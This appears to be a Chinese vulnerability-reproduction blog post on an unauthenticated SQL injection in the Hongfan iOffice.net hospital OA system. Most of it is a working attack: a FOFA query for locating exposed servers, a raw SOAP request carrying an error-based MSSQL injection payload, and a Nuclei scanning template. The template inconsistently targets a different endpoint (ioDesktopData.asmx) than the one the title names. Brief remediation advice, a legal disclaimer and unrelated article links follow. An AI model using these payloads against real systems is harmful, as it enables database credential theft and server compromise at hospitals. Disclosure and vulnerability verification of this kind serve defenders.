【漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入

【产品&&漏洞简述】

红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

红帆iOffice.net wssRtSyn.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

【资产测绘Query】

复制代码
  1. app="红帆-ioffice"

【产品界面】

【poc】

复制代码
  1. POST /iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1
  2. Host: your-ip
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
  4. Content-Type: text/xml
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  6. Accept-Encoding: gzip,deflate
  7. Connection: Keep-alive
  8. <?xml version="1.0"?>
  9. <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://iOffice.net/iOffice/ioRtSyn">
  10. <soap:Header />
  11. <soap:Body>
  12. <tns:SubmitLogInfo>
  13. <tns:data>qwe</tns:data>
  14. <tns:ServerHost>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tns:ServerHost>
  15. </tns:SubmitLogInfo>
  16. </soap:Body>
  17. </soap:Envelope>

【Nuclei-Poc验证】

复制代码
  1. id: hongfan-iOffice-wssRtSyn-sqli
  2. info:
  3. name: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞
  4. author: 王阿姨介绍的
  5. severity: critical
  6. description: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
  7. reference:
  8. metadata:
  9. verified: true
  10. max-request: 1
  11. fofa-query: FOFA:app="红帆-ioffice"
  12. tags: sqli
  13. requests:
  14. - raw:
  15. - |
  16. POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1
  17. Host: {``{Hostname}}
  18. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
  19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  20. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  21. Accept-Encoding: gzip, deflate
  22. Connection: close
  23. Upgrade-Insecure-Requests: 1
  24. SOAPAction: http://tempuri.org/GetDepSchedule
  25. Content-Type: text/xml;charset=UTF-8
  26. <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
  27. <soap:Header/>
  28. <soap:Body>
  29. <tem:GetDepSchedule>
  30. <!--type: string-->
  31. <tem:EmpLoginID>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tem:EmpLoginID>
  32. </tem:GetDepSchedule>
  33. </soap:Body>
  34. </soap:Envelope>
  35. matchers-condition: and
  36. matchers:
  37. - type: word
  38. part: body
  39. words:
  40. - 'SQL Server'
  41. - 'System'
  42. condition: and
  43. - type: status
  44. status:
  45. - 500

【修复建议】

1、请联系厂商进行修复。

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

相关推荐
时序数据说6 分钟前
时序数据库IoTDB在航空航天领域的解决方案
大数据·数据库·时序数据库·iotdb
.生产的驴21 分钟前
SpringBoot 封装统一API返回格式对象 标准化开发 请求封装 统一格式处理
java·数据库·spring boot·后端·spring·eclipse·maven
AnsenZhu33 分钟前
2025年Redis分片存储性能优化指南
数据库·redis·性能优化·分片
oydcm1 小时前
MySQL数据库概述
数据库·mysql
oioihoii1 小时前
C++23中if consteval / if not consteval (P1938R3) 详解
java·数据库·c++23
带娃的IT创业者1 小时前
《AI大模型趣味实战》基于RAG向量数据库的知识库AI问答助手设计与实现
数据库·人工智能
husterlichf2 小时前
MYSQL 常用数值函数 和 条件函数 详解
数据库·sql·mysql
我的golang之路果然有问题2 小时前
快速了解redis,个人笔记
数据库·经验分享·redis·笔记·学习·缓存·内存
卡皮巴拉爱吃小蛋糕3 小时前
MySQL的MVCC【学习笔记】
数据库·笔记·mysql
农民也会写代码3 小时前
dedecms织梦arclist标签noflag属性过滤多个参数
开发语言·数据库·sql·php·dedecms